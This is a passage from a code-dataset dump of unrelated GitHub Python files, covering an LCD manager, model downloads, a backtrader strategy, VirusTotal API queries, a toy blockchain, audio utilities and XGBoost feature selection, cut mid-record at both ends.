w.writerows(results)","repo_name":"korpog/airq","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42822248571","text":"import threading\nimport math\n\nfrom . import driver\n\n\nNUM_COLUMNS = 20\n\nLOGIN_MESSAGE = 'Please login with your university card'\nGREATING_MESSAGE = '\\n Welcome,\\n{}\\n'\n\n\nclass LcdManager:\n lcd_lock = threading.Lock()\n lcd_handle = None\n\n @staticmethod\n def _lcd_init():\n LcdManager.lcd_handle = driver.lcd()\n\n @staticmethod\n def display_login_message():\n LcdManager.write_autojump(LOGIN_MESSAGE, 2)\n \n @staticmethod\n def display_student_greating(name, surname):\n id_string = name if len(name) + len(surname) + 1 > NUM_COLUMNS else f'{name} {surname}'\n LcdManager.write_multiline(GREATING_MESSAGE.format(_center(id_string)))\n\n @staticmethod\n def write_autojump(string, start=1):\n words = string.split(' ')\n \n lines = [''] * (start - 1)\n while words:\n line_words = list()\n acc_len = 0\n while words:\n if acc_len + len(words[0]) <= NUM_COLUMNS:\n acc_len += len(words[0]) + 1\n line_words.append(words.pop(0))\n else:\n break\n lines.append(_center(' '.join(line_words)))\n if len(lines) >= 4:\n break\n \n LcdManager.write_multiline('\\n'.join(lines))\n\n \n\n @staticmethod\n def write_multiline(string):\n with LcdManager.lcd_lock:\n if LcdManager.lcd_handle is None:\n LcdManager._lcd_init()\n LcdManager.lcd_handle.lcd_clear()\n for index, line in enumerate(string.split('\\n')):\n LcdManager.lcd_handle.lcd_display_string(line, index + 1)\n\n\ndef _center(string):\n padding_len = NUM_COLUMNS - len(string)\n string_len = padding_len // 2 + len(string)\n return string.rjust(string_len)","repo_name":"musergi/pbe_2019","sub_path":"client/lcd/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557169668","text":"import os.path\nfrom pathlib import Path\nfrom transformers import BertTokenizerFast, BertForMultipleChoice, BertForQuestionAnswering, BertModel, \\\n AutoModelForQuestionAnswering\n\nsave_dir = Path('model')\nmodel_names = ['hfl/chinese-roberta-wwm-ext', 'hfl/chinese-macbert-base', 'hfl/chinese-macbert-large',\n 'hfl/chinese-xlnet-base', 'Langboat/mengzi-bert-base', 'ckiplab/bert-base-chinese']\nmodel_tasks = [BertModel, BertModel, BertModel, AutoModelForQuestionAnswering, BertModel, BertModel]\n\nfor model_name, model_task in zip(model_names, model_tasks):\n model_dir = save_dir / os.path.split(model_name)[-1]\n model_dir.mkdir(exist_ok=True, parents=True)\n\n tokenizer = BertTokenizerFast.from_pretrained(model_name)\n model = model_task.from_pretrained(model_name)\n tokenizer.save_pretrained(model_dir)\n model.save_pretrained(model_dir)","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW2/preprocess_model.py","file_name":"preprocess_model.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9347068020","text":"import os\nimport urllib.parse\nfrom pathlib import Path\n\nimport validators\nimport yaml\nfrom rspub.core.rs_paras import RsParameters, WELL_KNOWN_URL\nfrom rspub.util import defaults\n\n\nclass ElasticRsParameters(RsParameters):\n def __init__(self, **kwargs):\n super(ElasticRsParameters, self).__init__(**kwargs)\n self.resource_set = kwargs['resource_set']\n self.res_root_dir = kwargs['res_root_dir']\n self.elastic_host = kwargs['elastic_host']\n self.elastic_port = kwargs['elastic_port']\n self.elastic_index = kwargs['elastic_index']\n self.elastic_resource_doc_type = kwargs['elastic_resource_doc_type']\n self.elastic_change_doc_type = kwargs['elastic_change_doc_type']\n self.tmp_dir = kwargs.get('tmp_dir')\n\n # def abs_metadata_dir(self) -> str:\n # \"\"\"\n # ``derived`` :samp:`The absolute path to metadata directory`\n # :return: absolute path to metadata directory\n # \"\"\"\n # return self.metadata_dir\n #\n # @property\n # def metadata_dir(self):\n # return self._metadata_dir\n #\n # @metadata_dir.setter\n # def metadata_dir(self, path):\n # if not os.path.isabs(path):\n # path = os.path.join(self.resource_dir, path)\n #\n # self._metadata_dir = path\n\n def abs_tmp_dir(self) -> str:\n parent = str(Path(self.abs_metadata_dir()).parent)\n return os.path.join(parent, self.tmp_dir)\n\n @property\n def url_prefix(self):\n return self._url_prefix\n\n def description_url(self):\n \"\"\"\n ``derived`` :samp:`The current description url`\n\n The current description url either points to ``{server root}/.well-known/resourcesync``\n or to a file in the metadata directory.\n\n :return: current description url\n\n See also: :func:`has_wellknown_at_root`\n \"\"\"\n if self.has_wellknown_at_root:\n # r = urllib.parse.urlsplit(self.url_prefix)\n # return urllib.parse.urlunsplit([r[0], r[1], WELL_KNOWN_URL, \"\", \"\"])\n return urllib.parse.urljoin(self.url_prefix, WELL_KNOWN_URL)\n else:\n path = self.abs_metadata_path(WELL_KNOWN_URL)\n rel_path = os.path.relpath(path, self.resource_dir)\n return self.url_prefix + defaults.sanitize_url_path(rel_path)\n\n @url_prefix.setter\n def url_prefix(self, value):\n if value.endswith(\"/\"):\n value = value[:-1]\n parts = urllib.parse.urlparse(value)\n if parts[0] not in [\"http\", \"https\"]: # scheme\n raise ValueError(\"URL schemes allowed are 'http' or 'https'. Given: '%s'\" % value)\n is_valid_domain = validators.domain(parts.hostname) # hostname\n\n if parts.port is None:\n is_valid_port = True\n\n else:\n is_valid_port = is_int(parts.port)\n\n if not is_valid_domain:\n raise ValueError(\"URL has invalid domain name: '%s'. Given: '%s'\" % (parts.hostname, value))\n if not is_valid_port:\n raise ValueError(\"URL has invalid port: '%s'. Given: '%s'\" % (parts.port, value))\n if parts[4] != \"\": # query\n raise ValueError(\"URL should not have a query string. Given: '%s'\" % value)\n if parts[5] != \"\": # fragment\n raise ValueError(\"URL should not have a fragment. Given: '%s'\" % value)\n is_valid_url = validators.url(value)\n if not is_valid_url:\n raise ValueError(\"URL is invalid. Given: '%s'\" % value)\n if not value.endswith(\"/\"):\n value += \"/\"\n self._url_prefix = value\n\n @staticmethod\n def from_yaml_params(config_file):\n\n f = open(config_file, 'r+')\n config = yaml.load(f)['executor']\n\n if not os.path.exists(config['description_dir']):\n os.makedirs(config['description_dir'])\n\n rs_params = ElasticRsParameters(**config)\n return rs_params\n\n\ndef is_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n","repo_name":"openminted/omtd-rspub-elastic","sub_path":"omtdrspub/elastic/elastic_rs_paras.py","file_name":"elastic_rs_paras.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1784867393","text":"import backtrader as bt\nimport pandas as pd\nfrom datetime import datetime\n\n\n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (('maperiod', 20), ('printlog', False))\n\n def log(self, txt, dt=None, doprint=False):\n ''' Logging function fot this strategy'''\n if self.params.printlog or doprint:\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def __init__(self):\n # Keep a reference to the \"close\" line in the data[0] dataseries\n self.dataclose = self.datas[0].close\n\n # To keep track of pending orders and buy price/commission\n self.order = None\n self.buyprice = None\n self.buycomm = None\n\n # Add a MovingAverageSimple indicator\n self.sma = bt.indicators.SimpleMovingAverage(self.datas[0], period=self.params.maperiod)\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' % (order.executed.price, order.executed.value, order.executed.comm))\n\n self.buyprice = order.executed.price\n self.buycomm = order.executed.comm\n else: # Sell\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' % (order.executed.price, order.executed.value, order.executed.comm))\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log('Order Canceled/Margin/Rejected')\n\n self.order = None\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' % (trade.pnl, trade.pnlcomm))\n\n def next(self):\n # Simply log the closing price of the series from the reference\n self.log('Close, %.2f' % self.dataclose[0])\n\n # Check if an order is pending ... if yes, we cannot send a 2nd one\n if self.order:\n return\n\n # Check if we are in the market\n if not self.position:\n\n # 大于均线就买\n if self.dataclose[0] > self.sma[0]:\n\n # BUY, BUY, BUY!!! (with all possible default parameters)\n self.log('BUY CREATE, %.2f' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.buy()\n\n else:\n\n if self.dataclose[0] < self.sma[0]:\n # 小于均线卖卖卖!\n self.log('SELL CREATE, %.2f' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.sell()\n\n def stop(self):\n self.log('(MA Period %2d) Ending Value %.2f' % (self.params.maperiod, self.broker.getvalue()), doprint=True)\n\n\nif __name__ == '__main__':\n cerebro = bt.Cerebro()\n\n # 增加一个策略\n cerebro.addstrategy(TestStrategy, printlog=True, maperiod=14)\n\n # 增加多参数的策略\n # strats = cerebro.optstrategy(TestStrategy, maperiod=range(10, 31))\n\n #获取数据\n start_date = datetime(2021, 11, 3) # 回测开始时间\n end_date = datetime(2022, 11, 3) # 回测结束时间\n stock_hfq_df = pd.read_csv(\"./data/sh600000.csv\", index_col=\"datetime\", parse_dates=True, usecols=[\"datetime\", \"open\", \"high\", \"low\", \"close\", \"volume\"])\n stock_hfq_df = stock_hfq_df.iloc[::-1]\n data = bt.feeds.PandasData(dataname=stock_hfq_df, fromdate=start_date, todate=end_date) # 加载数据\n\n cerebro.adddata(data) # 将数据传入回测系统\n\n cerebro.broker.setcash(100000.0)\n # Set the commission - 0.1% ... divide by 100 to remove the %\n cerebro.broker.setcommission(commission=0)\n # Add a FixedSize sizer according to the stake 每次买卖的股数量\n cerebro.addsizer(bt.sizers.FixedSize, stake=100)\n\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\n\n cerebro.run()\n\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n\n cerebro.plot()","repo_name":"xiangxn/backtrader-example","sub_path":"five.py","file_name":"five.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"71920846248","text":"\"\"\"\nThe examples in this file are for virustotal-python version >=0.1.0\n\nRetrieve IP addresses using the VirusTotal API.\n\nDocumentation:\n\n * v3 documentation\n\n https://developers.virustotal.com/reference/ip-info\n https://developers.virustotal.com/reference/ip-object#relationships\n https://developers.virustotal.com/reference/ip-votes-post\n\n * v2 documentation - https://developers.virustotal.com/v2.0/reference/ip-address-report\n\"\"\"\nfrom virustotal_python import Virustotal\nfrom pprint import pprint\n\nAPI_KEY = \"\"\n\n# (Google DNS)\nIP = \"8.8.8.8\"\n\n# v3 examples\nvtotal = Virustotal(API_KEY=API_KEY)\n\n# Get information about an IP address\nresp = vtotal.request(f\"ip_addresses/{IP}\")\n# Get objects (relationships) related to an IP address\n# Get historical_whois relationship to the IP address\nresp = vtotal.request(f\"ip_addresses/{IP}/historical_whois\")\n# Get communicating_files related to the IP address with a limit of 5\nresp = vtotal.request(f\"ip_addresses/{IP}/communicating_files\", params={\"limit\": 5})\n\n# Get votes for an IP address\nresp = vtotal.request(f\"ip_addresses/{IP}/votes\")\n# Add a vote for an IP address\n# Verdict can be either harmless or malicious\nvote = {\"data\": {\"type\": \"vote\", \"attributes\": {\"verdict\": \"harmless\"}}}\nresp = vtotal.request(f\"ip_addresses/{IP}/votes\", json=vote, method=\"POST\")\n\n# v2 examples\nvtotal = Virustotal(API_KEY=API_KEY, API_VERSION=2)\n# Get information about an IP address\nresp = vtotal.request(\"ip-address/report\", params={\"ip\": IP})\npprint(resp.json())\n","repo_name":"dbrennand/virustotal-python","sub_path":"examples/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"40241626554","text":"import pytest\nfrom Adv_Dark_Deep.Char_Creation import roll_abilities\n\n\nclass Test3d6:\n def test_multiple_rolls(self):\n for i in range(25): # Run 25 tests (equals 150 rolls)\n rolls = roll_abilities.three_d6()\n for val in rolls:\n assert 3 <= val <= 18\n\n\nclass Test4d6:\n def test_multiple_rolls(self):\n for i in range(25):\n rolls = roll_abilities.four_d6_drop_lowest()\n for val in rolls:\n assert 3 <= val <= 18\n\n\nclass Test2d6:\n def test_multiple_rolls(self):\n for i in range(25):\n rolls = roll_abilities.two_d6_plus_6()\n for val in rolls:\n assert 3 <= val <= 18\n","repo_name":"crystalattice/Fantasy_RPG","sub_path":"Adv_Dark_Deep/tests/test_abilities_roll.py","file_name":"test_abilities_roll.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3614088913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: berrystruction\nThis implementation comes after reading the following online material:\n- https://www.youtube.com/watch?v=pRG1kh85zwI\n- https://applicature.com/blog/blockchain-technology/blockchain-code-examples\n- https://lhartikk.github.io/jekyll/update/2017/07/13/chapter2.html\n\"\"\"\n\nimport argparse\nimport hashlib\nfrom datetime import datetime\n\n# Argument parsing\nap = argparse.ArgumentParser();\nap.add_argument(\"n1\", default=15, help=\"Number of blocks to add to the chain\")\nargs = vars(ap.parse_args())\n\n\nclass Block:\n def __init__(self, index, timestamp, data, previous_hash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.hash_block()\n\n def hash_block(self):\n sha = hashlib.sha256()\n sha.update(str(self.index).encode('utf-8') +\n str(self.timestamp).encode('utf-8') +\n str(self.data).encode('utf-8') +\n str(self.previous_hash).encode('utf-8'))\n return sha.hexdigest()\n\n\ndef create_genesis_block():\n return Block(0, datetime.now(), \"Genesis Block\", \"0\")\n\ndef next_block(last_block):\n this_index = last_block.index + 1\n this_timestamp = datetime.now()\n this_data = \"Hey! I'm block \" + str(this_index)\n this_hash = last_block.hash\n return Block(this_index, this_timestamp, this_data, this_hash)\n\ndef main(num_of_blocks_to_add_str):\n print('MyBlockchain v1.1.0')\n print('---------------------------------')\n #print(num_of_blocks_to_add_str)\n\n num_of_blocks_to_add = int(num_of_blocks_to_add_str)\n blockchain = [create_genesis_block()]\n previous_block = blockchain[0]\n \n if num_of_blocks_to_add < 0: # num_of_blocks_to_add == '{}':\n # default value \n num_of_blocks_to_add = 1\n\n for i in range(0, num_of_blocks_to_add):\n block_to_add = next_block(previous_block)\n blockchain.append(block_to_add)\n previous_block = block_to_add\n # Tell everyone about it!\n print(\"Block #{} has been added to the blockchain!\".format(block_to_add.index))\n print(\"Hash: {}n\".format(block_to_add.hash))\n\nif __name__ == '__main__':\n main(args['n1'])","repo_name":"berrrystruction/simple_sample_blockchain","sub_path":"py_proj/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446144607","text":"# *****************************************************\n#\n# Program Author: Frances Zhao\n# Completion Date: May 22 2021\n# Program Name: lesson21_5.py\n# Description: Create using loops. Write a procedure to output the pattern. In each case the procedure should have\n# one parameter which is the number of rows. Test your procedures with input from programmer and from\n# user.\n#\n# *****************************************************\nimport random\n\n\n# function to replace a with aa\ndef make_aa(word):\n new_word = str()\n for i in range(len(word)):\n if \"aA\".find(word[i]) != -1:\n new_word += word[i]+word[i]\n else:\n new_word += word[i]\n return new_word\n\n\n# function to replace letter b in a string with \"ac\"\ndef replace_b(word):\n new_word = str()\n for i in range(len(word)):\n if \"bB\".find(word[i]) != -1:\n new_word += \"ac\"\n else:\n new_word += word[i]\n return new_word\n\n\n# function to randomly insert the letter c in a string\ndef random_c(word):\n new_word = str()\n length = len(word)-1\n index = random.randint(0, length)\n for i in range(length+1):\n if i == index:\n new_word += \"c\"\n new_word +=word[i]\n return new_word\n\n\n# main program:\nfunctioncall = random.randint(1,10) # function calls = random\nfor i in range(functioncall):\n selection = [make_aa, replace_b, random_c]\n choices = random.choice(selection)\n word = input(\"Please enter a word!: \") # prompting user for a word\n while not (word.isalpha()):\n word = input(\"Please enter an alphabetical word: \")\n print(f\"your word put in a random function is: {choices(word)}.\") # using a random function and printing result\n","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 21/lesson21_5.py","file_name":"lesson21_5.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28319756381","text":"routes = [[-20,15], [-14,-5], [-18,-13], [-5,-3]]\r\n\r\ndef solution(routes):\r\n routes = [[i[0], i[1]] for i in sorted(routes, key=lambda x: (x[0]))]\r\n # 배열 순서를 고속도로 진입 시점이 가장 빠른(-20) 지점부터 정렬\r\n result = [routes.pop(0)] # 0 번째 배열 pop\r\n\r\n print('routes :', routes)\r\n print('result :', result)\r\n\r\n for i in routes:\r\n idx = 0\r\n while idx != len(result):\r\n if (result)[idx][0] <= i[0] <= result[idx][1] or (result[idx][0] <= i[1] <= result[idx][1]):\r\n result[idx][0] = i[0] if i[0] > result[idx][0] else result[idx][0]\r\n result[idx][1] = i[1] if i[1] < result[idx][1] else result[idx][1]\r\n # pop 해서 얻은 result 배열과 남은 routes 배열들을 비교해가면서 범위를 좁혀나간다.(ex:-20 에서 -18로)\r\n break\r\n else:\r\n idx += 1\r\n # 계속 비교해나가면서 좁혀지는 범위안에 들어오지 못하는 배열이 생기면\r\n # 그 만큼의 범위를 단속하기 위한 새 감시카메라를 설치한다.\r\n if idx == len(result):\r\n result.append(i)\r\n\r\n return len(result)\r\n\r\nprint(solution(routes))\r\n\r\n","repo_name":"daehanchoi-dev/BOJ-BAEKJOONALGORITHM","sub_path":"단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7799467975","text":"import sys\n\nN,M = map(int, sys.stdin.readline().split(' '))\n\npos_cost = []\ncosts = [[float(\"inf\") for _ in range(N)] for _ in range(N) ]\ncostPresum = [0]\nfor i in range(N):\n costs[i][i] = 0\n\ndef getCost(a,b):\n return costPresum[-1]-(costPresum[b+1]-costPresum[a])\n\ndef calculToRight(a,b):\n c = b+1\n if c == N or costs[c][a] != float(\"inf\"):\n return False\n cost = getCost(a,b)\n costs[c][a] = min(cost*(pos_cost[c][0]-pos_cost[a][0])+costs[a][b], cost*(pos_cost[c][0]-pos_cost[b][0])+costs[b][a])\n return True\n\ndef calculToLeft(b,c):\n a = b-1\n if a == -1 or costs[a][c] != float(\"inf\"):\n return False\n cost = getCost(b,c)\n costs[a][c] = min(cost*(pos_cost[c][0]-pos_cost[a][0])+costs[c][b], cost*(pos_cost[b][0]-pos_cost[a][0])+costs[b][c])\n return True\n\nfor _ in range(N):\n temp = tuple(map(int,sys.stdin.readline().split(' ')))\n costPresum.append(costPresum[-1]+temp[1])\n pos_cost.append(temp)\n \nqueue = [(M-1,M-1)]\n\nwhile len(queue) != 0:\n a,b = queue.pop(0)\n if calculToLeft(a,b):\n queue.append((a-1,b))\n if calculToRight(a,b):\n queue.append((a,b+1))\n \nprint(min(costs[0][N-1],costs[N-1][0]))","repo_name":"LeeHanSeong7/AlgorithmLab","sub_path":"Baekjoon/problem/python/2315.py","file_name":"2315.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5293924014","text":"import wx\nfrom hyperreal.gui.Dialogues import error\nfrom wx.lib import wordwrap\n\n\nclass ImagePanel(wx.Panel):\n\n def __init__(self, parent):\n wx.Panel.__init__(self, parent, -1)\n self.parent = parent\n\n image = wx.Image(1, 1)\n self.photo_max_size = 900\n self.image_control = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(image))\n\n self.image_control.Bind(wx.EVT_RIGHT_DOWN, parent.on_right_down)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.AddStretchSpacer()\n sizer.Add(self.image_control, 0, wx.CENTER)\n sizer.AddStretchSpacer()\n\n self.SetSizer(sizer)\n\n def load_image(self, filename):\n try:\n image = wx.Image(filename, wx.BITMAP_TYPE_ANY)\n self.image_control.SetBitmap(wx.Bitmap(image))\n self.parent.SetSize(image.GetWidth(), image.GetHeight() + 100)\n self.Refresh()\n except IOError:\n error(self, \"Image file %s not found\" % filename)\n\n\nclass TextPanel(wx.Panel):\n\n def __init__(self, parent):\n wx.Panel.__init__(self, parent, -1)\n\n self.text = wx.StaticText(self, label=\"empty\")\n self.text.Bind(wx.EVT_RIGHT_DOWN, parent.on_right_down)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.text)\n self.SetSizer(sizer)\n\n def load_text(self, text: str):\n self.text.SetLabel(label=text)\n self.text.Wrap(1000)\n","repo_name":"wsrtka/Hyperreal","sub_path":"hyperreal/gui/Panels.py","file_name":"Panels.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28885783597","text":"import numpy as np\nimport scipy.io.wavfile\n\nLEN_CLIP = 10\nLEN_SILENCE = 0.25\nOUTPUT_LEVELS = 40\nRATE = 22050\n\n\ndef save_wav(data, filename, rate=RATE):\n scipy.io.wavfile.write(filename, rate, data)\n\n\ndef load_wav(filename):\n if isinstance(filename, list):\n data = []\n for f in filename:\n d, rate = load_wav(f)\n data.append(d)\n return np.concatenate(data, axis=0), rate\n rate, data = scipy.io.wavfile.read(filename)\n return data, rate\n\n\ndef find_latency(train_signal='chirp'):\n from train import BASE_DIR\n if train_signal == 'chirp':\n train_signal = BASE_DIR + 'train2.wav'\n train_label = BASE_DIR + 'train2_2204_212.wav'\n elif train_signal == 'noise':\n train_signal = BASE_DIR + 'train.wav'\n train_label = BASE_DIR + 'train_2204_212.wav'\n elif train_signal == 'validation':\n train_signal = BASE_DIR + 'validation.wav'\n train_label = BASE_DIR + 'validation_2204_212.wav'\n train_signal, _ = load_wav(train_signal)\n train_label, _ = load_wav(train_label)\n train_label = train_label[:train_signal.size]\n\n # def normalize(x):\n # x = x-np.mean(x)\n # x = x/np.std(x)\n # return x\n def normalize(x):\n x = np.sign(x).astype('float')\n return x\n train_label = normalize(train_label)\n train_signal = normalize(train_signal)\n\n max_shift = int(RATE*3*1e-3)\n shifts = np.arange(0, max_shift)\n mses = [np.mean(np.square(train_signal-train_label)) if shift == 0\n else np.mean(np.square(train_signal[shift:]-train_label[:-shift]))\n for shift in shifts]\n print(mses)\n print(np.mean(np.square(train_label)))\n print(shifts[np.argmin(mses)])\n\n\ndef generate_noise(length, std=0.1):\n return np.random.normal(loc=0., scale=std, size=[length])\n\n\ndef generate_chirp(length, f_start, f_end, harmonic_ratio):\n n_harmonics = int(np.floor(np.log2(RATE/2/max([f_start, f_end]))))\n if max([f_start, f_end])*2**n_harmonics >= RATE/2:\n raise ValueError('Cannot have %i harmonics. Highest frequency is above the Nyquist rate' % n_harmonics)\n t = np.linspace(0, length, int(length*RATE))\n f = np.linspace(f_start, f_end, int(length*RATE), endpoint=True)\n signal = np.zeros(int(length*RATE), dtype='float')\n for h in range(n_harmonics):\n fh = f*2**h\n signal += (harmonic_ratio**h)*np.sin(2*np.pi*fh*t)\n return signal\n\n\ndef generate_train_signal(saveto):\n \"\"\"\n generate segments of length LEN_CLIP seconds with LEN_SILENCE second of silence at the end of each\n\n :param saveto: path to save training wav file\n :return:\n \"\"\"\n length = int((LEN_CLIP-LEN_SILENCE)*RATE)\n signal = []\n for std in np.logspace(-3.5, -1, OUTPUT_LEVELS, endpoint=True):\n signal.append(generate_noise(length, std=std))\n signal.append(np.zeros([int(RATE*LEN_SILENCE)]))\n signal = np.concatenate(signal)\n save_wav(signal, saveto, RATE)\n\n\ndef generate_train_signal2(saveto):\n signal = []\n f_low = 40 # bass low E\n f_high = 80*8 # twelfth fret high E\n for harmonic_ratio in [0.1*i for i in range(10)]:\n chirp = generate_chirp(LEN_CLIP - LEN_SILENCE, f_low, f_high, harmonic_ratio)\n for i, std in enumerate(np.logspace(-3.5, -0.6, OUTPUT_LEVELS, endpoint=True)):\n x = np.sqrt(2)*std*chirp\n signal.append(x)\n signal.append(np.zeros([int(RATE*LEN_SILENCE)]))\n signal = np.concatenate(signal)\n save_wav(signal, saveto, RATE)\n\n\ndef split_signal(data):\n # split_length = 96000 # this appears to be the limit for laptop cpu training\n split_length = int(np.ceil(data.size/(data.size//1e5)))\n if data.size % split_length != 0:\n data = np.concatenate([data, np.zeros(split_length-(data.size % split_length), dtype=data.dtype)], axis=0)\n data = np.array(np.split(data, np.ceil(data.size/split_length)))\n data = np.expand_dims(data, axis=1)\n return data\n # data = np.expand_dims(np.expand_dims(data, axis=0), axis=0)\n # return data\n\n\ndef clear_print(string='', end=''):\n clear = '\\x1b[2K\\r'\n print(clear+string, end=end)\n","repo_name":"jrbtaylor/ampclone","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36676717553","text":"from xgboost import XGBRegressor\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import r2_score\nimport numpy as np\n\nx, y = load_diabetes(return_X_y=True)\n# print(x.shape, y.shape) # (506, 13) (506,)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=21)\n'''\nparameter = [\n {'gamma': [0,10,100,1000], 'max_depth': [2,4,6,8,10]},\n]\n\nmodel = XGBRegressor()\nrandom = RandomizedSearchCV(model, parameter, verbose=1)\nrandom.fit(x_train, y_train)\n\nbest_estimator = random.best_estimator_\nbest_score = random.best_score_\n# print('best parameter = ', best_estimator)\n# print('best score = ', best_score)\n'''\nfrom sklearn.feature_selection import SelectFromModel\n\nmodel = XGBRegressor(\n base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bynode=1, colsample_bytree=1, gamma=1000, gpu_id=-1,\n importance_type='gain', interaction_constraints='', \n learning_rate=0.300000012, max_delta_step=0, max_depth=8, \n min_child_weight=1, monotone_constraints='()',\n n_estimators=100, n_jobs=8, num_parallel_tree=1, random_state=0,\n reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,\n tree_method='exact', validate_parameters=1, verbosity=None\n)\nmodel.fit(x_train, y_train)\n\nthreshold = np.sort(model.feature_importances_)\nfor thresh in threshold:\n # print(thresh)\n \n selection = SelectFromModel(model, threshold=thresh, prefit=True)\n # print(selection)\n \n select_x_train = selection.transform(x_train)\n select_x_test = selection.transform(x_test)\n # print(select_x_train.shape, select_x_test.shape)\n\n selection_model = XGBRegressor(\n base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bynode=1, colsample_bytree=1, gamma=1000, gpu_id=-1,\n importance_type='gain', interaction_constraints='', \n learning_rate=0.300000012, max_delta_step=0, max_depth=8, \n min_child_weight=1, monotone_constraints='()',\n n_estimators=100, n_jobs=8, num_parallel_tree=1, random_state=0,\n reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,\n tree_method='exact', validate_parameters=1, verbosity=None\n )\n selection_model.fit(select_x_train, y_train)\n\n y_pred = selection_model.predict(select_x_test)\n\n score1 = r2_score(y_test, y_pred)\n score2 = selection_model.score(select_x_test, y_test)\n\n print('Thresh=%.3f, n=%d, r2=%.2f%%' %(thresh, select_x_train.shape[1], \n score1*100))\n\n\n\n\n","repo_name":"MinseokCHAE/Bitcamp3","sub_path":"ml/ml25_selectfrommodel.py","file_name":"ml25_selectfrommodel.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19549145982","text":"def first(n,array1):\r\n a = dict()\r\n count = 1\r\n for i in array1:\r\n if i not in a:\r\n a[i]= count\r\n else:\r\n a[i] = a[i]+count\r\n bigcount = None\r\n bigword = None\r\n for w,c in a.items():\r\n if bigcount is None or c > bigcount:\r\n bigword = w\r\n print(bigword)\r\nfirst(int(input()),input().split(' '))","repo_name":"MagiMagesh/Guvi-Codekata","sub_path":"Guvi Codekata/array-70.py","file_name":"array-70.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37403837960","text":"from srcnn import SRCNN\nimport torch\nimport cv2\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(figsize=(40, 20))\nax1 = plt.subplot(121)\nax2 = plt.subplot(122)\nnet = SRCNN(num_channel=3)\n\nimage = torch.tensor(cv2.imread(\"./test.jpg\", cv2.IMREAD_UNCHANGED)).permute(2,0,1) /255.\nimage = image.view(1, *image.size())\n\nnet.load_state_dict(torch.load('srcnn_saved.pth'))\n\ny = net(image)\n\nax1.imshow(image[0, 0, 